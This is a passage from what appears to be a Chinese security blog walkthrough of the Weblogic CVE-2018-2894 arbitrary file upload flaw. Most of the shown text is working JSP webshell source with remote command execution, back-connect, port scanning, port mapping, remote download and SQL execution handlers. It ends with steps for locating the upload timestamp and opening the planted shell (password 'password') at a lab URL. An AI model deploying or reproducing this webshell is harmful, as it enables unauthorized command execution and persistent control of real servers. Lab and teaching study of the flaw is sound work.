\""+SHELL_NAME+"\" method=\"post\" οnsubmit=\"this.submit();$('cmd').value='';return false;\" target=\"asyn\">"+ " \"text\" id=\"cmd\" name=\"cmd\" class=\"input\" style=\"width:80%\">"+ " \"o\" id=\"o\" type=\"hidden\" value=\"online\"/>\"hidden\" id=\"ddtype\" name=\"type\" value=\"ecmd\"/>"+ " "+ " \"checkbox\" checked=\"checked\" id=\"autoscroll\">Auto Scroll"+ " \"button\" value=\"Stop\" class=\"bt\" οnclick=\"$('ddtype').value='stop';this.form.submit()\">"+ " "
+ " " ); out.println("
"
); } catch (Exception e) { e.printStackTrace(); throw e ; } } } private static class OnLineInvoker extends DefaultInvoker { public boolean doBefore(){return false;} public boolean doAfter(){return false;} public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ try { String type = request.getParameter("type"); if (Util.isEmpty(type)) return; if (type.toLowerCase().equals("start")) { String exe = request.getParameter("exe"); if (Util.isEmpty(exe)) return; Process pro = Runtime.getRuntime().exec(exe); ByteArrayOutputStream outs = new ByteArrayOutputStream(); response.setContentLength(100000000); response.setContentType("text/html;charset="+Charset.defaultCharset().name()); OnLineProcess olp = new OnLineProcess(pro); JSession.setAttribute(SHELL_ONLINE,olp); new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//????????? Thread.sleep(1000 * 60 * 60 * 24); } else if (type.equals("ecmd")) { Object o = JSession.getAttribute(SHELL_ONLINE); String cmd = request.getParameter("cmd"); if (Util.isEmpty(cmd)) return; if (o == null) return; OnLineProcess olp = (OnLineProcess)o; olp.setCmd(cmd); } else { Object o = JSession.getAttribute(SHELL_ONLINE); if (o == null) return; OnLineProcess olp = (OnLineProcess)o; olp.stop(); } } catch (Exception e) { e.printStackTrace(); throw e ; } } } static{ ins.put("script",new ScriptInvoker()); ins.put("before",new BeforeInvoker()); ins.put("after",new AfterInvoker()); ins.put("deleteBatch",new DeleteBatchInvoker()); ins.put("clipboard",new ClipBoardInvoker()); ins.put("vRemoteControl",new VRemoteControlInvoker()); ins.put("gc",new GcInvoker()); ins.put("vPortScan",new VPortScanInvoker()); ins.put("portScan",new PortScanInvoker()); ins.put("vConn",new VConnInvoker()); ins.put("dbc",new DbcInvoker()); ins.put("executesql",new ExecuteSQLInvoker()); ins.put("vLogin",new VLoginInvoker()); ins.put("login",new LoginInvoker()); ins.put("filelist", new FileListInvoker()); ins.put("logout",new LogoutInvoker()); ins.put("upload",new UploadInvoker()); ins.put("copy",new CopyInvoker()); ins.put("bottom",new BottomInvoker()); ins.put("vCreateFile",new VCreateFileInvoker()); ins.put("vEdit",new VEditInvoker()); ins.put("createFile",new CreateFileInvoker()); ins.put("vEditProperty",new VEditPropertyInvoker()); ins.put("editProperty",new EditPropertyInvoker()); ins.put("vs",new VsInvoker()); ins.put("shell",new ShellInvoker()); ins.put("down",new DownInvoker()); ins.put("vd",new VdInvoker()); ins.put("downRemote",new DownRemoteInvoker()); ins.put("index",new IndexInvoker()); ins.put("mkdir",new MkDirInvoker()); ins.put("move",new MoveInvoker()); ins.put("removedir",new RemoteDirInvoker()); ins.put("packBatch",new PackBatchInvoker()); ins.put("pack",new PackInvoker()); ins.put("unpack",new UnPackInvoker()); ins.put("vmp",new VmpInvoker()); ins.put("vbc",new VbcInvoker()); ins.put("backConnect",new BackConnectInvoker()); ins.put("jspEnv",new JspEnvInvoker()); ins.put("smp",new SmpInvoker()); ins.put("mapPort",new MapPortInvoker()); ins.put("top",new TopInvoker()); ins.put("vso",new VOnLineShellInvoker()); ins.put("online",new OnLineInvoker()); } %> <% try { String o = request.getParameter("o"); if (!Util.isEmpty(o)) { Invoker in = ins.get(o); if (in == null) { response.sendRedirect(SHELL_NAME+"?o=index"); } else { if (in.doBefore()) { String path = request.getParameter("folder"); if (!Util.isEmpty(path)) session.setAttribute(CURRENT_DIR,path); ins.get("before").invoke(request,response,session); ins.get("script").invoke(request,response,session); ins.get("top").invoke(request,response,session); } in.invoke(request,response,session); if (!in.doAfter()) { return; }else{ ins.get("bottom").invoke(request,response,session); ins.get("after").invoke(request,response,session); } } } else { response.sendRedirect(SHELL_NAME+"?o=index"); } } catch (Exception e) { ByteArrayOutputStream bout = new ByteArrayOutputStream(); e.printStackTrace(new PrintStream(bout)); session.setAttribute(CURRENT_DIR,SHELL_DIR); Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","
"
),"left"); bout.close(); out.flush(); ins.get("bottom").invoke(request,response,session); ins.get("after").invoke(request,response,session); } %>

然后我们点击 F12,搜索keystore_table,找到时间戳

Weblogic漏洞(四)之 CVE-2018-2894 任意文件上传漏洞_第13张图片

我们找到时间戳 1693490044164

Weblogic漏洞(四)之 CVE-2018-2894 任意文件上传漏洞_第14张图片

然后我们通过URL:http://IP:7001/ws_utc/css/config/keystore/【时间戳】_dama.jsp(密码password)访问木马

所以我们在浏览器构造以下的URL访问木马的地址:

http://192.168.41.132:7001/ws_utc/css/config/keystore/1693490044164_dama.jsp

Weblogic漏洞(四)之 CVE-2018-2894 任意文件上传漏洞_第15张图片

然后输入密码password访问dama木马

Weblogic漏洞(四)之 CVE-2018-2894 任意文件上传漏洞_第16张图片

你可能感兴趣的:(中间件漏洞,网络安全,网络,安全)